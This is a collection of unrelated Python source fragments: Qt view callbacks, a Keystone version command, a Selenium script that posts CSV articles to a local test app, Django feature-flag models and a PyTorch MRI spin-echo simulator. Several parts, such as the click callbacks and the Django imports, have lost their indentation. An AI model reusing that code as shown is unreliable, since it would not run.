    return self._rubber_band
def rubber_band_color(self):
    """
    Returns the color used to draw the selection rubber band.
    :return: QColor
    """
    return self._rubber_band_color
def set_rubber_band_color(self, color):
    """
    Sets the rubber band color and drops the cached rubber band so
    it gets rebuilt with the new color on next access.
    :param color: QColor
    """
    self._rubber_band = None
    self._rubber_band_color = color
def rubber_band_start_event(self, event):
    """
    Starts a rubber band selection at the pressed position.
    :param event: QMouseEvent
    """
    self._rubber_band_start_pos = event.pos()
    band = self.rubber_band()
    band.setGeometry(QRect(self._rubber_band_start_pos, QSize()))
    band.show()
def rubber_band_move_event(self, event):
    """
    Resizes the rubber band to follow the mouse while selecting.
    Does nothing until a selection has been started.
    :param event: QMouseEvent
    """
    if not (self.rubber_band() and self._rubber_band_start_pos):
        return
    geometry = QRect(self._rubber_band_start_pos, event.pos()).normalized()
    self.rubber_band().setGeometry(geometry)
# ============================================================================================================
# INTERNAL
# ============================================================================================================
def _drag_pixmap(self, item, items):
    """
    Internal function that shows the pixmap for the given item during drag operation
    :param item: LibraryItem
    :param items: list(LibraryItem)
    :return: QPixmap
    """
    # snapshot of the dragged item's visual rect
    rect = self.visualRect(self.index_from_item(item))
    pixmap = QPixmap()
    # NOTE(review): QPixmap.grabWidget is a Qt4-era API removed in Qt5
    # (replaced by QWidget.grab) - confirm the Qt binding in use
    pixmap = pixmap.grabWidget(self, rect)
    # when several items are dragged, badge the pixmap with their count
    if len(items) > 1:
        custom_width = 35
        custom_padding = 5
        custom_text = str(len(items))
        # NOTE(review): QRect expects ints while custom_x is a float here -
        # presumably the binding coerces; verify
        custom_x = pixmap.rect().center().x() - float(custom_width * 0.5)
        custom_y = pixmap.rect().top() + custom_padding
        custom_rect = QRect(custom_x, custom_y, custom_width, custom_width)
        painter = QPainter(pixmap)
        painter.setRenderHint(QPainter.Antialiasing)
        painter.setPen(Qt.NoPen)
        # circular badge drawn in the selection colours
        painter.setBrush(self.viewer().background_selected_color())
        painter.drawEllipse(custom_rect.center(), float(custom_width * 0.5), float(custom_width * 0.5))
        font = QFont('Serif', 12, QFont.Light)
        painter.setFont(font)
        painter.setPen(self.viewer().text_selected_color())
        painter.drawText(custom_rect, Qt.AlignCenter, str(custom_text))
    return pixmap
# ============================================================================================================
# CALLBACKS
# ============================================================================================================
def _on_index_clicked(self, index):
"""
Callback function that is called when the user clicks on an item
:param index: QModelIndex
"""
item = self.item_from_index(index)
item.clicked()
self.set_items_selected([item], True)
self.itemClicked.emit(item)
def _on_index_double_clicked(self, index):
"""
Callback function that is called when the user double clicks on an item
:param index: QModelIndex
"""
item = self.item_from_index(index)
self.set_items_selected([item], True)
item.double_clicked()
self.itemDoubleClicked.emit(item)
|
from keystone.backends.sqlalchemy import migration
from keystone import version
from keystone.manage2 import base
from keystone.manage2 import common
from keystone.logic.types import fault
@common.arg('--api', action='store_true',
    default=False,
    help='only print the API version')
@common.arg('--implementation', action='store_true',
    default=False,
    help='only print the implementation version')
@common.arg('--database', action='store_true',
    default=False,
    help='only print the database version')
class Command(base.BaseSqlalchemyCommand):
    """Returns keystone version data.

    Provides the latest API version, implementation version, database version,
    or all of the above, if none is specified.
    """

    @staticmethod
    def get_api_version():
        """Returns a complete API version string."""
        return ' '.join([version.API_VERSION, version.API_VERSION_STATUS])

    @staticmethod
    def get_implementation_version():
        """Returns a complete implementation version string."""
        return version.version()

    @staticmethod
    def get_database_version():
        """Returns the database's current migration level.

        Raises fault.DatabaseMigrationError when the database is not under
        version control.
        """
        return migration.db_version(Command._get_connection_string())

    def run(self, args):
        """Process argparse args, and print results to stdout."""
        # with no filter flags given, print every version
        show_all = not (args.api or args.implementation or args.database)

        if args.api or show_all:
            # parenthesized so the same statement is valid on Python 2 and 3
            print('API v%s' % Command.get_api_version())
        if args.implementation or show_all:
            print('Implementation v%s' % Command.get_implementation_version())
        if args.database or show_all:
            try:
                version_str = 'v%s' % (self.get_database_version())
            except fault.DatabaseMigrationError:
                version_str = 'not under version control'
            print('Database %s' % (version_str))
|
"""Unit test package for htping."""
|
from selenium import webdriver
import time
import csv
from csv import reader
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# Logs into the local conduit app and publishes one article per CSV data row.
browser = webdriver.Chrome("/usr/bin/chromedriver")
browser.get("http://localhost:1667")
browser.maximize_window()

# ACCEPT COOKIES
browser.find_element_by_xpath('//button[2]').click()

# LOGIN
browser.find_element_by_xpath('//*[@id="app"]/nav/div/ul/li[2]/a').click()
email = browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/fieldset[1]/input')
password = browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/fieldset[2]/input')
email.send_keys("user2@hotmail.com")
time.sleep(1)
password.send_keys("Userpass1")
time.sleep(1)
browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/button').click()
time.sleep(1)
user_name = WebDriverWait(
    browser, 5).until(
    EC.visibility_of_element_located((By.XPATH, '//*[@id="app"]/nav/div/ul/li[4]/a'))
)
assert user_name.text == "user2"
print(user_name.text)
time.sleep(1)
print(f"BEJELENTKEZÉS: {user_name.text}")

# DATA INPUT FROM FILE
# row 0 holds the form placeholders, rows 1..n hold the article data
input_file = 'input_article.csv'
with open(input_file, 'r') as data:
    csv_reader = reader(data)
    # Get all rows of csv from csv_reader object as list of tuples
    input_post = list(map(tuple, csv_reader))

# NEW ARTICLE
time.sleep(2)
post_num = len(input_post) - 1  # number of data rows (row 0 is the header)
line_num = len(input_post[0])   # number of form fields per article
# bug fix: range(1, post_num) skipped the last data row; post_num + 1
# makes the loop cover every data row 1..post_num inclusive
for i in range(1, post_num + 1):
    browser.find_element_by_xpath('//*[@href="#/editor"]').click()
    print(i, input_post[i][0], input_post[i][1], input_post[i][2], input_post[i][3])
    time.sleep(2)
    for j in range(0, line_num):
        # the header row provides the placeholder text used to locate each field
        browser.find_element_by_xpath(f'//*[@placeholder="{input_post[0][j]}"]').send_keys(input_post[i][j])
    time.sleep(2)
    publish_btn = WebDriverWait(browser, 5).until(EC.visibility_of_element_located((By.XPATH, '//button[1]'))).click()
    time.sleep(2)
browser.quit()
|
from __future__ import unicode_literals
import logging
import typing
from copy import deepcopy
from django.core.exceptions import (
NON_FIELD_ERRORS,
ObjectDoesNotExist,
ValidationError,
)
from django.db import models
from django.db.models import Q, UniqueConstraint
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django_lifecycle import AFTER_CREATE, BEFORE_CREATE, LifecycleModel, hook
from ordered_model.models import OrderedModelBase
from simple_history.models import HistoricalRecords
from environments.identities.helpers import (
get_hashed_percentage_for_object_ids,
)
from features.custom_lifecycle import CustomLifecycleModelMixin
from features.feature_states.models import AbstractBaseFeatureValueModel
from features.feature_types import MULTIVARIATE
from features.helpers import get_correctly_typed_value
from features.multivariate.models import MultivariateFeatureStateValue
from features.utils import (
get_boolean_from_string,
get_integer_from_string,
get_value_type,
)
from features.value_types import (
BOOLEAN,
FEATURE_STATE_VALUE_TYPES,
INTEGER,
STRING,
)
from projects.models import Project
from projects.tags.models import Tag
logger = logging.getLogger(__name__)
if typing.TYPE_CHECKING:
from environments.identities.models import Identity
from environments.models import Environment
@python_2_unicode_compatible
class Feature(CustomLifecycleModelMixin, models.Model):
    """A feature flag owned by a project.

    Creating a Feature automatically creates a default FeatureState for
    every environment in the project (see create_feature_states).
    """

    name = models.CharField(max_length=2000)
    created_date = models.DateTimeField("DateCreated", auto_now_add=True)
    project = models.ForeignKey(
        Project,
        related_name="features",
        help_text=_(
            "Changing the project selected will remove previous Feature States for the previously"
            "associated projects Environments that are related to this Feature. New default "
            "Feature States will be created for the new selected projects Environments for this "
            "Feature. Also this will remove any Tags associated with a feature as Tags are Project defined"
        ),
        on_delete=models.CASCADE,
    )
    # stored as a string regardless of the value's real type; parsed via the
    # features.utils helpers when default feature state values are created
    initial_value = models.CharField(
        max_length=20000, null=True, default=None, blank=True
    )
    description = models.TextField(null=True, blank=True)
    default_enabled = models.BooleanField(default=False)
    type = models.CharField(max_length=50, null=True, blank=True)
    history = HistoricalRecords()
    tags = models.ManyToManyField(Tag, blank=True)
    is_archived = models.BooleanField(default=False)
    owners = models.ManyToManyField(
        "users.FFAdminUser", related_name="owned_features", blank=True
    )

    class Meta:
        # Note: uniqueness is changed to reference lowercase name in explicit SQL in the migrations
        unique_together = ("name", "project")
        ordering = ("id",)  # explicit ordering to prevent pagination warnings

    @hook(AFTER_CREATE)
    def create_feature_states(self):
        """Create a default FeatureState in every environment of the project."""
        # create feature states for all environments
        environments = self.project.environments.all()
        for env in environments:
            # unable to bulk create as we need signals
            FeatureState.objects.create(
                feature=self,
                environment=env,
                identity=None,
                feature_segment=None,
                enabled=self.default_enabled,
            )

    def validate_unique(self, *args, **kwargs):
        """
        Checks unique constraints on the model and raises ``ValidationError``
        if any failed.
        """
        super(Feature, self).validate_unique(*args, **kwargs)

        # handle case insensitive names per project, as above check allows it
        if (
            Feature.objects.filter(project=self.project, name__iexact=self.name)
            .exclude(pk=self.pk)
            .exists()
        ):
            raise ValidationError(
                {
                    NON_FIELD_ERRORS: [
                        "Feature with that name already exists for this project. Note that feature "
                        "names are case insensitive.",
                    ],
                }
            )

    def __str__(self):
        return "Project %s - Feature %s" % (self.project.name, self.name)
def get_next_segment_priority(feature):
    """Return the next priority value for a feature's segments.

    Priority 1 is the highest; new segments are appended after the currently
    lowest-priority one.

    :param feature: Feature to compute the next segment priority for
    :return: int priority (1 when the feature has no segments yet)
    """
    # single query: fetch the lowest-priority segment directly instead of
    # issuing a separate COUNT query first
    lowest = (
        FeatureSegment.objects.filter(feature=feature)
        .order_by("-priority")
        .first()
    )
    return 1 if lowest is None else lowest.priority + 1
@python_2_unicode_compatible
class FeatureSegment(OrderedModelBase):
    """Links a Feature to a Segment within an Environment, with a priority.

    Priority 1 is the highest (see __lt__); ordering is managed by
    OrderedModelBase through the `priority` field.
    """

    feature = models.ForeignKey(
        Feature, on_delete=models.CASCADE, related_name="feature_segments"
    )
    segment = models.ForeignKey(
        "segments.Segment", related_name="feature_segments", on_delete=models.CASCADE
    )
    environment = models.ForeignKey(
        "environments.Environment",
        on_delete=models.CASCADE,
        related_name="feature_segments",
    )
    _enabled = models.BooleanField(
        default=False,
        db_column="enabled",
        help_text="Deprecated in favour of using FeatureStateValue.",
    )
    _value = models.CharField(
        max_length=2000,
        blank=True,
        null=True,
        db_column="value",
        help_text="Deprecated in favour of using FeatureStateValue.",
    )
    _value_type = models.CharField(
        choices=FEATURE_STATE_VALUE_TYPES,
        max_length=50,
        blank=True,
        null=True,
        db_column="value_type",
        help_text="Deprecated in favour of using FeatureStateValue.",
    )

    # specific attributes for managing the order of feature segments
    priority = models.PositiveIntegerField(editable=False, db_index=True)
    order_field_name = "priority"
    order_with_respect_to = ("feature", "environment")

    # used for audit purposes
    history = HistoricalRecords()

    class Meta:
        unique_together = ("feature", "environment", "segment")
        ordering = ("priority",)

    def __str__(self):
        return (
            "FeatureSegment for "
            + self.feature.name
            + " with priority "
            + str(self.priority)
        )

    def __lt__(self, other):
        """
        Kind of counter intuitive but since priority 1 is highest, we want to check if priority is GREATER than the
        priority of the other feature segment.
        """
        return other and self.priority > other.priority

    def clone(self, environment: "Environment") -> "FeatureSegment":
        """Copy this feature segment into another environment."""
        clone = deepcopy(self)
        clone.id = None  # force an INSERT on save
        clone.environment = environment
        clone.save()
        return clone

    # noinspection PyTypeChecker
    def get_value(self):
        # NOTE(review): reads self.value_type / self.value - presumably
        # properties provided by a parent/mixin not visible here; confirm
        return get_correctly_typed_value(self.value_type, self.value)
@python_2_unicode_compatible
class FeatureState(LifecycleModel, models.Model):
    """The state of a Feature within a given scope.

    Exactly one of three scopes applies, enforced by the Meta constraints:
      - environment default (identity and feature_segment both null)
      - segment override (feature_segment set)
      - identity override (identity set), the highest priority (see __gt__)
    """

    feature = models.ForeignKey(
        Feature, related_name="feature_states", on_delete=models.CASCADE
    )
    environment = models.ForeignKey(
        "environments.Environment",
        related_name="feature_states",
        null=True,
        on_delete=models.CASCADE,
    )
    identity = models.ForeignKey(
        "identities.Identity",
        related_name="identity_features",
        null=True,
        default=None,
        blank=True,
        on_delete=models.CASCADE,
    )
    feature_segment = models.ForeignKey(
        FeatureSegment,
        related_name="feature_states",
        null=True,
        blank=True,
        default=None,
        on_delete=models.CASCADE,
    )
    enabled = models.BooleanField(default=False)
    history = HistoricalRecords()

    class Meta:
        # Note: this is manually overridden in the migrations for Oracle DBs to include
        # all 4 unique fields in each of these constraints. See migration 0025.
        constraints = [
            UniqueConstraint(
                fields=["environment", "feature", "feature_segment"],
                condition=Q(identity__isnull=True),
                name="unique_for_feature_segment",
            ),
            UniqueConstraint(
                fields=["environment", "feature", "identity"],
                condition=Q(feature_segment__isnull=True),
                name="unique_for_identity",
            ),
            UniqueConstraint(
                fields=["environment", "feature"],
                condition=Q(identity__isnull=True, feature_segment__isnull=True),
                name="unique_for_environment",
            ),
        ]
        ordering = ["id"]

    def __gt__(self, other):
        """
        Checks if the current feature state is higher priority that the provided feature state.

        :param other: (FeatureState) the feature state to compare the priority of
        :return: True if self is higher priority than other
        :raises ValueError: when the two states are not comparable (different
            environments, features or identities)
        """
        if self.environment != other.environment:
            raise ValueError(
                "Cannot compare feature states as they belong to different environments."
            )

        if self.feature != other.feature:
            raise ValueError(
                "Cannot compare feature states as they belong to different features."
            )

        if self.identity:
            # identity is the highest priority so we can always return true
            if other.identity and self.identity != other.identity:
                raise ValueError(
                    "Cannot compare feature states as they are for different identities."
                )
            return True

        if self.feature_segment:
            # Return true if other_feature_state has a lower priority feature segment and not an identity overridden
            # flag, else False.
            return not (other.identity or self.feature_segment < other.feature_segment)

        # if we've reached here, then self is just the environment default. In this case, other is higher priority if
        # it has a feature_segment or an identity
        return not (other.feature_segment or other.identity)

    def clone(self, env: "Environment") -> "FeatureState":
        """Copy this feature state (and its value) into another environment."""
        # Cloning the Identity is not allowed because they are closely tied
        # to the environment
        assert self.identity is None
        clone = deepcopy(self)
        clone.id = None  # force an INSERT on save
        # re-point at the matching segment override in the target environment
        clone.feature_segment = (
            FeatureSegment.objects.get(
                environment=env,
                feature=clone.feature,
                segment=self.feature_segment.segment,
            )
            if self.feature_segment
            else None
        )
        clone.environment = env
        clone.save()
        # clone the related objects
        self.feature_state_value.clone(clone)
        return clone

    def get_feature_state_value(self, identity: "Identity" = None) -> typing.Any:
        """Return the typed value of this state, per-identity for MV features."""
        feature_state_value = (
            self.get_multivariate_feature_state_value(identity)
            if self.feature.type == MULTIVARIATE and identity
            else getattr(self, "feature_state_value", None)
        )

        # return the value of the feature state value only if the feature state
        # has a related feature state value. Note that we use getattr rather than
        # hasattr as we want to return None if no feature state value exists.
        return feature_state_value and feature_state_value.value

    def get_multivariate_feature_state_value(
        self, identity: "Identity"
    ) -> AbstractBaseFeatureValueModel:
        """Deterministically pick a multivariate option for the given identity."""
        # the multivariate_feature_state_values should be prefetched at this point
        # so we just convert them to a list and use python operations from here to
        # avoid further queries to the DB
        mv_options = list(self.multivariate_feature_state_values.all())

        percentage_value = (
            get_hashed_percentage_for_object_ids([self.id, identity.id]) * 100
        )

        # Iterate over the mv options in order of id (so we get the same value each
        # time) to determine the correct value to return to the identity based on
        # the percentage allocations of the multivariate options. This gives us a
        # way to ensure that the same value is returned every time we use the same
        # percentage value.
        start_percentage = 0
        for mv_option in sorted(mv_options, key=lambda o: o.id):
            limit = getattr(mv_option, "percentage_allocation", 0) + start_percentage
            if start_percentage <= percentage_value < limit:
                return mv_option.multivariate_feature_option

            start_percentage = limit

        # if none of the percentage allocations match the percentage value we got for
        # the identity, then we just return the default feature state value (or None
        # if there isn't one - although this should never happen)
        return getattr(self, "feature_state_value", None)

    @property
    def previous_feature_state_value(self):
        """The value this state held before its latest change, or None."""
        try:
            history_instance = self.feature_state_value.history.first()

            return (
                history_instance
                and getattr(history_instance, "prev_record", None)
                and history_instance.prev_record.instance.value
            )
        except ObjectDoesNotExist:
            # no feature state value related object exists yet
            return None

    @hook(BEFORE_CREATE)
    def check_for_existing_env_feature_state(self):
        """Guard the environment-default uniqueness before insert."""
        # prevent duplicate feature states being created for an environment
        if FeatureState.objects.filter(
            environment=self.environment, feature=self.feature
        ).exists() and not (self.identity or self.feature_segment):
            raise ValidationError(
                "Feature state already exists for this environment and feature"
            )

    @hook(AFTER_CREATE)
    def create_feature_state_value(self):
        # note: this is only performed after create since feature state values are
        # updated separately, and hence if this is performed after each save,
        # it overwrites the FSV with the initial value again
        FeatureStateValue.objects.create(
            feature_state=self,
            **self.get_feature_state_value_defaults(),
        )

    @hook(AFTER_CREATE)
    def create_multivariate_feature_state_values(self):
        if not (self.feature_segment or self.identity):
            # we only want to create the multivariate feature state values for
            # feature states related to an environment only, i.e. when a new
            # environment is created or a new MV feature is created
            mv_feature_state_values = [
                MultivariateFeatureStateValue(
                    feature_state=self,
                    multivariate_feature_option=mv_option,
                    percentage_allocation=mv_option.default_percentage_allocation,
                )
                for mv_option in self.feature.multivariate_options.all()
            ]
            MultivariateFeatureStateValue.objects.bulk_create(mv_feature_state_values)

    def get_feature_state_value_defaults(self) -> dict:
        """Kwargs for the initial FeatureStateValue, from the feature's initial_value."""
        if self.feature.initial_value is None:
            return {}

        value = self.feature.initial_value
        type = get_value_type(value)
        # parse the stored string into its declared type (strings pass through)
        parse_func = {
            BOOLEAN: get_boolean_from_string,
            INTEGER: get_integer_from_string,
        }.get(type, lambda v: v)
        key_name = self.get_feature_state_key_name(type)

        return {"type": type, key_name: parse_func(value)}

    @staticmethod
    def get_feature_state_key_name(fsv_type) -> str:
        """Map a value type to the FeatureStateValue field holding that value."""
        return {
            INTEGER: "integer_value",
            BOOLEAN: "boolean_value",
            STRING: "string_value",
        }.get(fsv_type)

    @staticmethod
    def get_featue_state_value_type(value) -> str:
        # NOTE(review): method name is misspelled ("featue") but kept as-is -
        # callers elsewhere may rely on it
        fsv_type = type(value).__name__
        accepted_types = (STRING, INTEGER, BOOLEAN)

        # Default to string if not an anticipate type value to keep backwards compatibility.
        return fsv_type if fsv_type in accepted_types else STRING

    def generate_feature_state_value_data(self, value):
        """
        Takes the value of a feature state to generate a feature state value and returns dictionary
        to use for passing into feature state value serializer

        :param value: feature state value of variable type
        :return: dictionary to pass directly into feature state value serializer
        """
        fsv_type = self.get_featue_state_value_type(value)
        return {
            "type": fsv_type,
            "feature_state": self.id,
            self.get_feature_state_key_name(fsv_type): value,
        }

    def __str__(self):
        s = f"Feature {self.feature.name} - Enabled: {self.enabled}"
        if self.environment is not None:
            s = f"{self.environment} - {s}"
        elif self.identity is not None:
            s = f"Identity {self.identity.identifier} - {s}"
        return s
class FeatureStateValue(AbstractBaseFeatureValueModel):
    """The typed value attached to a FeatureState (one-to-one)."""

    feature_state = models.OneToOneField(
        FeatureState, related_name="feature_state_value", on_delete=models.CASCADE
    )

    # TODO: increase max length of string value on base model class
    string_value = models.CharField(null=True, max_length=20000, blank=True)

    history = HistoricalRecords()

    def clone(self, feature_state: FeatureState) -> "FeatureStateValue":
        """Copy this value onto another feature state."""
        clone = deepcopy(self)
        clone.id = None  # force an INSERT on save
        clone.feature_state = feature_state
        clone.save()
        return clone
|
from __future__ import division
import numpy as np
from warnings import warn
import torch
# Fixed MRI Simulator
def get_precomputed_matrices(batch_size, alphas, T):
    """Precompute the CPMG RF rotation matrices for every echo.

    :param batch_size: number of simulated voxels in the batch
    :param alphas: flip angle train in radians, shape (batch_size, T)
    :param T: echo train length
    :return: rotation matrices, shape (batch_size, 3, 3, T)
    """
    half_cos_sq = torch.cos(alphas / 2.) ** 2
    half_sin_sq = torch.sin(alphas / 2.) ** 2
    cos_a = torch.cos(alphas)
    sin_a = torch.sin(alphas)
    rot = torch.zeros(batch_size, 3, 3, T, device=alphas.device)
    rot[:, 0, 0, :] = half_cos_sq
    rot[:, 0, 1, :] = half_sin_sq
    rot[:, 0, 2, :] = sin_a
    rot[:, 1, 0, :] = half_sin_sq
    rot[:, 1, 1, :] = half_cos_sq
    rot[:, 1, 2, :] = -sin_a
    rot[:, 2, 0, :] = -0.5 * sin_a
    rot[:, 2, 1, :] = 0.5 * sin_a
    rot[:, 2, 2, :] = cos_a
    return rot
def rf(matrices, FpFmZ):
    """Apply precomputed RF rotation matrices to the EPG states.

    Assumes the CPMG condition (magnetization on the real x axis), so the
    rotation reduces to a real matrix product.

    :param matrices: rotation matrices, shape (..., 3, 3)
    :param FpFmZ: EPG state vectors, shape (..., 3, N)
    :return: rotated EPG states
    """
    return matrices @ FpFmZ
def rf_ex(FpFmZ, alpha):
    """Same as rf2_ex, but only returns the updated FpFmZ state."""
    updated, _ = rf2_ex(FpFmZ, alpha)
    return updated
def rf2_ex(FpFmZ, alpha):
    """ Propagate EPG states through an RF excitation of
    alpha (radians) along the y direction, i.e. phase of pi/2.
    in Pytorch

    INPUT:
        FpFmZ = 3xN vector of F+, F- and Z states.
        alpha = RF pulse flip angle in radians (scalar tensor, or a
                1-element sequence/tensor whose first entry is used)

    OUTPUT:
        FpFmZ = Updated FpFmZ state.
        RR = RF rotation matrix (3x3).
    """
    # accept a 1-element sequence/tensor; scalar/0-dim inputs raise here and
    # are used as-is (narrowed from a bare except, which hid unrelated errors)
    try:
        alpha = alpha[0]
    except (TypeError, IndexError):
        pass
    if torch.abs(alpha) > 2 * np.pi:
        warn('rf2_ex: Flip angle should be in radians! alpha=%f' % alpha)

    cosa2 = torch.cos(alpha/2.)**2
    sina2 = torch.sin(alpha/2.)**2
    cosa = torch.cos(alpha)
    sina = torch.sin(alpha)
    RR = torch.tensor([[cosa2, -sina2, sina],
                       [-sina2, cosa2, sina],
                       [-0.5 * sina, -0.5 * sina, cosa]], device=alpha.device)
    FpFmZ = torch.matmul(RR, FpFmZ)

    return FpFmZ, RR
def relax_mat(T, T1, T2):
    """Build the diagonal relaxation matrix diag([E2, E2, E1]) per voxel.

    :param T: relaxation interval (same units as T1/T2)
    :param T1: longitudinal relaxation times, shape (batch,)
    :param T2: transverse relaxation times, shape (batch,)
    :return: decay matrices, shape (batch, 3, 3)
    """
    transverse = torch.exp(-T / T2)    # E2, decays the F+ and F- states
    longitudinal = torch.exp(-T / T1)  # E1, decays the Z states
    # TODO Switch to point-wise multiplication
    diagonal = torch.stack([transverse, transverse, longitudinal], dim=1)
    return torch.diag_embed(diagonal)
def relax(FpFmZ, T1, T2, EE, RR):
    """ Propagate EPG states through a period of relaxation.

    INPUT:
        FpFmZ = EPG states, shape (batch, 3, N)
        T1, T2 = relaxation times (unused here; decay comes precomputed in EE)
        EE = precomputed decay matrix, diag([E2, E2, E1]) per voxel
        RR = T1 recovery term (1 - E1) added to the Z0 state

    OUTPUT:
        updated F+, F- and Z states
    """
    decayed = torch.matmul(EE, FpFmZ)          # Apply Relaxation
    decayed[:, 2, 0] = decayed[:, 2, 0] + RR   # Recovery
    return decayed
def grad(FpFmZ, i, noadd=False):
    """Propagate EPG states through a "unit" gradient. Assumes CPMG condition,
    i.e. all states are real-valued.

    Mutates FpFmZ in place and also returns it.

    INPUT:
        FpFmZ = EPG states, shape (batch, 3, N)
        i = echo index (currently unused)
        noadd = True to NOT add any higher-order states (currently unused;
                the state ladder has a fixed width)

    OUTPUT:
        Updated FpFmZ state.
    """
    snapshot = FpFmZ.clone()  # read from a copy to avoid in-place aliasing
    FpFmZ[:, 0, 1:] = snapshot[:, 0, :-1]  # F+ states dephase one order up
    FpFmZ[:, 1, :-1] = snapshot[:, 1, 1:]  # F- states rephase one order down
    FpFmZ[:, 1, -1] = 0                    # highest F- order falls off the ladder
    FpFmZ[:, 0, 0] = FpFmZ[:, 1, 0]        # F-0 flows into F+0 (real states)
    return FpFmZ
def FSE_TE(FpFmZ, alpha, TE, T1, T2, i, EE, RR, matrices, noadd=True, recovery=True):
    """ Propagate EPG states through a full TE, i.e.
    relax -> grad -> rf -> grad -> relax.
    Assumes CPMG condition, i.e. all states are real-valued.

    INPUT:
        FpFmZ = 3xN vector of F+, F- and Z states.
        alpha = RF pulse flip angle in radians (unused here; the rotation
                comes precomputed via `matrices`)
        T1, T2 = Relaxation times (same as TE)
        TE = Echo Time interval (same as T1, T2)
        i = echo index selecting the precomputed rotation matrix
        EE = precomputed half-TE relaxation decay matrix
        RR = precomputed half-TE T1 recovery term
        matrices = precomputed RF rotation matrices, shape (batch, 3, 3, T)
        noadd = True to NOT add any higher-order states - assume
                that they just go to zero. Be careful - this
                speeds up simulations, but may compromise accuracy!

    OUTPUT:
        FpFmZ = updated F+, F- and Z states.
    """
    FpFmZ = relax(FpFmZ, T1, T2, EE, RR)
    # bug fix: grad's signature is grad(FpFmZ, i, noadd); the arguments were
    # previously passed as (FpFmZ, noadd, i). Harmless today because grad
    # ignores both parameters, but wrong if grad ever starts using them.
    FpFmZ = grad(FpFmZ, i, noadd)
    FpFmZ = rf(matrices[:, :, :, i], FpFmZ)
    FpFmZ = grad(FpFmZ, i, noadd)
    FpFmZ = relax(FpFmZ, T1, T2, EE, RR)
    return FpFmZ
# Full FSE EPG function across T time points
def FSE_signal_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1=1.):
    """Same as FSE_signal2_TR_ex, but only returns Mxy"""
    Mxy, _ = FSE_signal2_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1)
    return Mxy
def epg_parallel(angles_rad, TE, TR, T1, T2, B1=1.):
    """Thin alias for FSE_signal_TR (batched EPG simulation)."""
    return FSE_signal_TR(angles_rad, TE, TR, T1, T2, B1)
def FSE_signal_TR(angles_rad, TE, TR, T1, T2, B1=1.):
    """Same as FSE_signal2_TR, but only returns Mxy"""
    Mxy, _ = FSE_signal2_TR(angles_rad, TE, TR, T1, T2, B1)
    return Mxy
def FSE_signal2_TR(angles_rad, TE, TR, T1, T2, B1=1.):
    """Same as FSE_signal2_TR_ex with a 90 degree excitation pulse.

    Bug fix: the B1 argument was previously ignored (a literal 1. was
    forwarded); it is now passed through to FSE_signal2_TR_ex so the
    transmit-field scaling actually applies.
    """
    pi = torch.tensor(np.pi, device=T2.device)
    return FSE_signal2_TR_ex(pi/2, angles_rad, TE, TR, T1, T2, B1)
def FSE_signal2_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1=1.):
    """Same as FSE_signal2_ex, but includes finite TR (steady-state scaling)."""
    echo_count = angles_rad.shape[1]
    Mxy, Mz = FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1)
    # time left for T1 recovery after the echo train
    recovery_time = TR - echo_count * TE
    E1 = torch.exp(-recovery_time / T1)[:, None, None]
    # scale by the steady-state longitudinal magnetization before excitation
    sig = Mxy * (1 - E1) / (1 - Mz[:, -1, :][:, None, :] * E1)
    return sig, Mz
def FSE_signal_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=1.):
    """Same as FSE_signal2_ex, but only returns Mxy"""
    Mxy, _ = FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1)
    return Mxy
def FSE_signal(angles_rad, TE, T1, T2):
    """Same as FSE_signal2, but only returns Mxy"""
    Mxy, _ = FSE_signal2(angles_rad, TE, T1, T2)
    return Mxy
def FSE_signal2(angles_rad, TE, T1, T2):
    """Same as FSE_signal2_ex, but assumes excitation pulse is 90 degrees"""
    ninety = torch.tensor(np.pi, device=T2.device) / 2
    return FSE_signal2_ex(ninety, angles_rad, TE, T1, T2)
def FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=1.):
    """Simulate Fast Spin-Echo CPMG sequence with specific flip angle train.
    Prior to the flip angle train, an excitation pulse of angle_ex_rad degrees
    is applied in the Y direction. The flip angle train is then applied in the X direction.

    INPUT:
        angles_rad = array of flip angles in radians equal to echo train length,
                     shape (batch, T)
        TE = echo time/spacing
        T1 = T1 value in seconds, shape (batch,)
        T2 = T2 value in seconds, shape (batch,)
        B1 = relative transmit field scale applied to all flip angles

    OUTPUT:
        Mxy = Transverse magnetization at each echo time, shape (batch, T, 1)
        Mz = Longitudinal magnetization at each echo time, shape (batch, T, 1)
    """
    batch_size = T2.shape[0]
    T = angles_rad.shape[1]
    Mxy = torch.zeros((batch_size, T, 1),
                      requires_grad=False, device=T2.device)
    Mz = torch.zeros((batch_size, T, 1), requires_grad=False, device=T2.device)
    # EPG state ladder: rows are F+, F-, Z; 2T+1 dephasing orders
    P = torch.zeros((batch_size, 3, 2*T+1),
                    dtype=torch.float32, device=T2.device)
    P[:, 2, 0] = 1.  # start at thermal equilibrium (Z0 = 1)
    # accept a 1-element sequence/tensor for B1; scalars raise and pass through
    # NOTE(review): bare except - narrow to (TypeError, IndexError) when safe
    try:
        B1 = B1[0]
    except:
        pass

    # pre-scale by B1 homogeneity
    angle_ex_rad = B1 * angle_ex_rad
    angles_rad = B1 * angles_rad

    P = rf_ex(P, angle_ex_rad)  # initial tip

    # relaxation precomputed per half echo spacing (relax-grad-rf-grad-relax)
    EE = relax_mat(TE/2., T1, T2)
    E1 = torch.exp(-TE/2./T1)
    RR = 1 - E1  # T1 recovery term per half TE

    matrices = get_precomputed_matrices(batch_size, angles_rad, T)
    for i in range(T):
        P = FSE_TE(P, angles_rad[:, i], TE, T1, T2, i, EE, RR, matrices)
        # at each echo, F+0 is the observable transverse signal
        Mxy[:, i, 0] = P[:, 0, 0]
        Mz[:, i, 0] = P[:, 2, 0]

    return Mxy, Mz
def SE_sim(angle_ex_rad, angles_rad, TE, T1, T2, TR, B1=1.):
    """Spin-echo signal with simple saturation-recovery TR weighting.

    Bug fix: the B1 argument was previously ignored (the call hard-coded
    B1=1.); it is now forwarded to FSE_signal2_ex.

    :return: (Mxy scaled by 1 - exp(-(TR - TE)/T1), Mz)
